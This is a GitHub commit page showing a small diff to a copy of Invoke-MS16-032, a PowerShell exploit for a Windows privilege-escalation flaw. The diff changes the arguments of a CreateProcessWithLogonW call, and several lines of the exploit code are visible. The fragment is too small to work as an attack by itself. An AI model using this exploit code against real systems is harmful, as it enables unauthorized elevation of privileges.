We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent fd712b3 commit 5877d7aCopy full SHA for 5877d7a
1 file changed
test.txt
@@ -330,7 +330,7 @@ function Invoke-MS16-032 {
330
# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
331
$CallResult = [Advapi32]::CreateProcessWithLogonW(
332
"user", "domain", "pass",
333
- 0x00000002, "C:\Windows\System32\cmd.exe", "/c powershell",
+ 0x00000002, "C:\Windows\System32\cmd.exe", "",
334
0x00000004, $null, $GetCurrentPath,
335
[ref]$StartupInfo, [ref]$ProcessInfo)
336
0 commit comments